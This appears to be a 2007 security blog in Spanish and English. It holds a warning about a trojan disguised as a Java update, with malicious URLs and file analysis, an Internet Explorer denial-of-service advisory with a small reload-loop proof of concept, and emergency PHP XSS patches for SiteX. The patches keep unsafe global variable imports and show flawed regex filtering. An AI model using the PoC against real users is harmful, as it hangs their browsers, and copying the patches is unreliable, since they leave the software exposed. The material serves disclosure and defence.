Troyano que simula ser actualizacion java

Saturday, June 02, 2007
En los ultimos dias se viene distribuyendo por correo electronico
un correo en el cual se nos informa de un fallo de seguridad en java


Desde ese mismo correo se nos insta a descargar la actualizacion que
solucionara el problema de seguridad.

Al ir al sitio de descarga ,que aparentemente es parecido al sitio
de descarga de Sum microsystems , se nos descarga un arcchivo llamado
install_javav6up2.exe el cual contiene un troyano.


Si obtenemos un pequeño informe del archivo vemos que se ha falseado
hasta la informacion de version del archivo para aparentar se de Sun
el mensaje incorpora varias url que provienen de un server el cual
seguramente ya este comprometido.

http://201.22.57.XX/JAVA/_software/update/index.php?request=Update&program=java
http://201.22.57.XX/JAVA/_software/update/index.php?USUARIO=5B3U6H843N45E82
http://201.22.57.XX/JAVA/_software/download/get.php?license=5B3U6H843N45E82&mode=manual

##################
Analisis del archivo
####################


********************************************************************
FileAlyzer © 2003-2005 Patrick M. Kolla. All Rights Reserved.
********************************************************************


File: C:\Documents and Settings\Lostmon\Escritorio\install_javav6up2.exe
Date: 02/06/2007 2:04:08


***** General ******************************************************
Ubicación: C:\Documents and Settings\Lostmon\Escritorio\
Tamaño: 192512
Versión: 1.2.5.2
CRC-32: 93EEBEE2
MD5: 70CACC3D64585343F6AA04C3135BA24B
SHA1: 20E9C0990D76AB1E8CF84C9425B3F64365E94926
Sólo lectura: No
Oculto: No
Archivo del sistema: No
Carpeta de archivos: No
Archivo: Yes
Enlace simbólico: No
Time stamp: sábado, 02 de junio de 2007 11:31:36
Creado: sábado, 02 de junio de 2007 11:31:34
Último acceso: sábado, 02 de junio de 2007 2:01:16
Modificado: sábado, 02 de junio de 2007 11:31:36


***** Versión ******************************************************
Idiomas soportados:: Portugués (Brasil) (1046/1252)
--- Versión --------------------------------------------------------
Versión del archivo: 1.2.5.2
Empresa: Java
Nombre interno:
Comentarios:
Copyright:
Marcas registradas:
Nombre original: instal_plugin98MEXP.exe
Nombre del producto:
Versión del producto: 2.0.0.0
Descripción: Sun Microsystems Corporation - Arquivo de atualização
Versión privada:
Versión especial:


***** Recursos *****************************************************
--- Cursor ---------------------------------------------------------
1
2
3
4
5
6
7
--- Bitmap ---------------------------------------------------------
BBABORT
BBALL
BBCANCEL
BBCLOSE
BBHELP
BBIGNORE
BBNO
BBOK
BBRETRY
BBYES
PREVIEWGLYPH
--- Icon -----------------------------------------------------------
1
2
--- Dialog ---------------------------------------------------------
DLGTEMPLATE
--- String Table ---------------------------------------------------
4081
4082
4083
4084
4085
4086
4087
4088
4089
4090
4091
4092
4093
4094
4095
4096
--- RCData ---------------------------------------------------------
DVCLAL
PACKAGEINFO
TXTREM
--- Cursor Group ---------------------------------------------------
32761
32762
32763
32764
32765
32766
32767
--- Icon Group -----------------------------------------------------
MAINICON
--- Version Info ---------------------------------------------------
1


***** Cabecera PE **************************************************
Signature: 00004550
Machine: 014C - Intel 386
Number of sections: 0008
Time/Date stamp: 2A425E19
Pointer to symbol table: 00000000
Number of symbols: 00000000
Size of optional header: 00E0
Characteristics: 818E
Magic: 010B
Linker version (major): 02
Linker version (minor): 19
Size of code: 00000000
Size of initialized data: 0000E800
Size of uninitialized data: 00000000
Address of entry point: 00064BD6
Base of code: 00001000
Base of data: 00050000
Image base: 00400000
Section alignment: 00001000
File alignment: 00000200
OS version (major): 0004
OS version (minor): 0000
Image version (major): 0000
Image version (minor): 0000
Sub system version (major): 0004
Sub system version (minor): 0000
Win32 version: 00000000
Size of image: 00066000
Size of headers: 00000400
Checksum: 000308BA
Sub system: 0002 - Windows graphical user interface (GUI) subsystem
DLL characteristics: 0000
Size of stack reserve: 00100000
Size of stack commit: 00004000
Size of heap reserve: 00100000
Size of heap commit: 00001000
Loader flags: 00000000
Number of RVA: 00000010


***** Secciones PE *************************************************
CRC-32: 7059EB4D
MD5: 83C09E84F35E245A0ADA5CC66D4C9B3B
----- Secciones PE -------------------------------------------------
Sección TamañoVirt. DirecciónVirt. TamañoFís. TamañoFís. Parámetros
0004F000 00001000 00028600 00000400 C0000040
00002000 00050000 00000A00 00028A00 C0000040
00001000 00052000 00000000 00029400 C0000040
00002000 00053000 00000E00 00029400 C0000040
00001000 00055000 00000000 0002A200 C0000040
00007000 00056000 00000200 0002A200 C0000040
.rsrc 00006000 0005D000 00002400 0002A400 C0000040
00003000 00063000 00002800 0002C800 C0000040


***** Importar/Exportar tabla **************************************
--- Export table ---------------------------------------------------
--- Import table (libraries: 2) ------------------------------------
kernel32.dll (imports: 1)
GetModuleHandleA
user32.dll (imports: 1)
MessageBoxA

################## €nd #############

--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)

--
La curiosidad es lo que hace mover la mente....

Internet Explorer Body tag recoverable DoS issue

Wednesday, April 25, 2007
#####################################################
Internet Explorer Body tag recoverable DoS issue
Vendor url:http://www.microsoft.com
Advisore:http://lostmon.blogspot.com/2007/04/posible-ie7-dos.html
Vendor notify:YES Vendor confirmed:YES Exploit include:YES
#####################################################


Microsoft Internet Explorer contains a flaw that may allow a
malicious user to cause IE7 to enter a loop in which IE7
become unresponsive resulting in a recoverable DoS issue.
(Only affect the process what we open the file)the user,only can
terminate the process

The result in Internet Explorer is the browser seems to "hang".
I have not discovered a way to leverage the "hang" to gain
execution of arbitrary code.


############
versions
############

Tested on all of this versions:

#########
IE7
#########

Windows Vista =>vulnerable
Windows XP SP2 =>vulnerable
Windows XP Home SP2 =>vulnerable

#########
IE6
#########

Windows 2000 => Not vulnerable ?
Windows XP SP2 =>vulnerable
Windows XP Home SP2 =>vulnerable


############
Solution
###########

Microsoft is working in a
update version, patch or similar.

#############
Timeline
#############

Discovered:29-01-2007
Vendor notify: 11-03-2007
Vendor response:11-03-2007
Private Disclosure:07-02-2007
Public Disclosure: 25-04-2007



#########################

IE7 and 6 Body tag PoC

#########################



###################

Source of eso.pl

###################



 print  "<html>\ n";
 print  "<head>";
 print  "<title>";
 print  "Internet Explorer Body tag DoS Perl PoC By Lostmon
(lostmon@Gmail.com)";
 print  "</title>";
 print  "</head>";
 print  "<body onload='location.reload()'>";
 print  "<p><a href='http://lostmon.blogspot.com/'>";
 print  "Internet Explorer Body tag DoS Perl PoC By Lostmon
(lostmon@Gmail.com)";
 print  "</a></p>";
 print  "</body>";
 print  "</html>";

##############################

##############################

Source of eso.html

##############################



 print  "<html>\ n"
 print  "<head>"
 print  "<title>"
 print  "Internet Explorer Body tag DoS Perl PoC By Lostmon
(lostmon@Gmail.com)"
 print  "</title>"
 print  "</head>"
 print  "<body onload='location.reload()'>"
 print  "<p><a href='http://lostmon.blogspot.com/'>"
 print  "Internet Explorer Body tag DoS Perl PoC By Lostmon
(lostmon@Gmail.com)"
 print  "</a></p>"
 print  "</body>"
 print  "</html>"


###############################

###############################

Source of eso.htm

###############################



<html>
<head>
<title>
Internet Explorer Body tag DoS Perl PoC By Lostmon (lostmon@Gmail.com)
</title>
</head>
<body onload='location.reload()'>
<p><a href='http://lostmon.blogspot.com/'>
Internet Explorer Body tag DoS Perl PoC By Lostmon (lostmon@Gmail.com)
</a>
</p>
</body>
</html>

################################



#######################End###################



Special THnx to Secunia Research Team they made
me include/understand of which one treated and
put in my hands !!!ALL!!! What i need for this research !!!!
Secunia:http://www.secunia.com/

Thnx To estrella pq siempre estas en mi pensamiento
aunque no coincidamos y por plantar en mi la semilla
de la curiosidad , durante noches y noches !!

Thnx To FalconDeOro :
la paciencia es un a virtud pequeño Jedy !!
Gracias por tu ayuda y soporte :*

Thnx to all Microsoft Security Response Center
in specia To Annette.
http://www.microsoft.com/technet/security/

--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....

Final patch For SiteX 0.7.3 beta XSS flaws

Saturday, April 21, 2007
####################################################
Patch for SiteX 0.7.3 beta XSS flaws
vendor url: http://sitex.bjsintay.com/
original article:http://lostmon.blogspot.com/2007/04/
final-patch-for-sitex-073-beta-xss.html
####################################################

patch for all of this related vulns:


http://osvdb.org/displayvuln.php?osvdb_id=33158
http://osvdb.org/displayvuln.php?osvdb_id=33159
http://osvdb.org/displayvuln.php?osvdb_id=33160

In all Files what we edit are included this file :

'includes/functions.php'

Open this file and add a new Function arround line 12-13

#####################################################
// stop XSS function to mitigate the posible XSS flaws
//use StopXSS(param or function)

function StopXSS($text){

$text = preg_replace("/(\<script)(.*?)(script>)/si", "", "$text");
$text = strip_tags($text);
$text = str_replace(array("'","\"",">","<","\\","`","´"), "", $text);
return $text;

}


####################################################

change this code :
####################################################
// - = - = - = - = - = - = - = - = -
// GLOBAL CODE
// - = - = - = - = - = - = - = - = -

// Convert post, get, and server variables for shorthand use and
// register globals compatibility

if (!empty($_POST)) foreach ($_POST as $k => $v) $$k = $v;
if (!empty($_GET)) foreach ($_GET as $k => $v) $$k = $v;
if (!empty($_SERVER)) foreach ($_SERVER as $k => $v) $$k = $v;
if (!empty($_COOKIE)) foreach ($_COOKIE as $k => $v) $$k = $v;
if (!empty($_SESSION)) foreach ($_SESSION as $k => $v) $$k = $v;

// Prevent PHP include vulnerability, initialize important vars,
will be over-written
#####################################################
for this other:
#####################################################
// - = - = - = - = - = - = - = - = -
// GLOBAL CODE
// - = - = - = - = - = - = - = - = -

// Convert post, get, and server variables for shorthand use and
// register globals compatibility

if (!empty($_POST)) foreach ($_POST as $k => $v) $$k = $v;
if (!empty($_GET)) foreach ($_GET as $k => $v) $$k = StopXSS($v);
if (!empty($_SERVER)) foreach ($_SERVER as $k => $v) $$k = StopXSS($v);
if (!empty($_COOKIE)) foreach ($_COOKIE as $k => $v) $$k = StopXSS($v);
if (!empty($_SESSION)) foreach ($_SESSION as $k => $v) $$k = StopXSS($v);

// Prevent PHP include vulnerability, initialize important vars, will be over-written
#####################################################

SiteX in full of XSS flaws , all variables are afected.


########################
OSVDB ID: 33158
########################
calendar.php
Cross-Site Scripting in variables $sxMonth and $sxYear fixed !!

########################
OSVDB ID: 33159
########################
search.php
Cross-site scripting in $search fixed !!

########################
OSVDB ID:33160
########################
redirect.php
Cross-Site scripting in $linkid fixed !!

#####################################################

it also fix this variables:

- albumid and page upon submision to adbum.php
- error upon submision to login.php
- type upon submision to search.php
- sxEntryID upon submision to journal.php
- photoid,albumid and page upon submision to photo.php
- forumid and topicid upon submision forums_topic.php

###################################################
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....

Posible patch for sitex

Saturday, April 14, 2007
Hello !

vendor url: http://sitex.bjsintay.com/

Specific entry:http://sourceforge.net/tracker/index.php?
func=detail&aid=1700736&group_id=121558&atid=690690

osvdb id:33158,33159,33160,33161

http://archives.neohapsis.com/archives/bugtraq/2007-02/0477.html

http://www.securityfocus.com/archive/1/archive
/1/461305/100/0/threaded


http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-1234

after study this vulns i found a simple posible patch.

Some others params are afected like albumid upon submit to albun.php
username box upon submision to login.php ,search box upon submision
to search.php and multiple others params.

The most of those flaws could be solve by a simple patch
for "emergency" before the vendor release a update or a patch.

Open includes/functions.php

arround line 12-13 we have this code
####################################################
// - = - = - = - = - = - = - = - = -
// GLOBAL CODE
// - = - = - = - = - = - = - = - = -

// Convert post, get, and server variables for shorthand use and
// register globals compatibility

if (!empty($_POST)) foreach ($_POST as $k => $v) $$k = $v;
if (!empty($_GET)) foreach ($_GET as $k => $v) $$k = $v;
if (!empty($_SERVER)) foreach ($_SERVER as $k => $v) $$k = $v;
if (!empty($_COOKIE)) foreach ($_COOKIE as $k => $v) $$k = $v;
if (!empty($_SESSION)) foreach ($_SESSION as $k => $v) $$k = $v;

// Prevent PHP include vulnerability, initialize important vars,
will be over-written
##################################################


you can change for this other :

##################################################

// stop XSS function to mitigate the posible XSS flaws
//use StopXSS(param or function)

function StopXSS($text){

$text = preg_replace("/(\)/si", "", "$text");
$text = strip_tags($text);
$text = str_replace(array("'","\"",">","<","\\"), "", $text);
return $text;

}

// - = - = - = - = - = - = - = - = -
// GLOBAL CODE
// - = - = - = - = - = - = - = - = -

// Convert post, get, and server variables for shorthand use and
// register globals compatibility

if (!empty($_POST)) foreach ($_POST as $k => $v) $$k = StopXSS($v);
if (!empty($_GET)) foreach ($_GET as $k => $v) $$k = StopXSS($v);
if (!empty($_SERVER)) foreach ($_SERVER as $k => $v) $$k = StopXSS($v);
if (!empty($_COOKIE)) foreach ($_COOKIE as $k => $v) $$k = StopXSS($v);
if (!empty($_SESSION)) foreach ($_SESSION as $k => $v) $$k = StopXSS($v);

// Prevent PHP include vulnerability, initialize important vars, will
be over-written

#########################################################

and the most of xss flaws now are solved :D

This patch are explain and update here :

http://lostmon.blogspot.com/2007/04/
final-patch-for-sitex-073-beta-xss.html

Thnx for your time !!!

Thnx to OSVDB !!!

--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....
 

Browse

About:Me

My blog:http://lostmon.blogspot.com
Mail:Lostmon@gmail.com
Lostmon Google group
Lostmon@googlegroups.com

La curiosidad es lo que hace
mover la mente...

Friends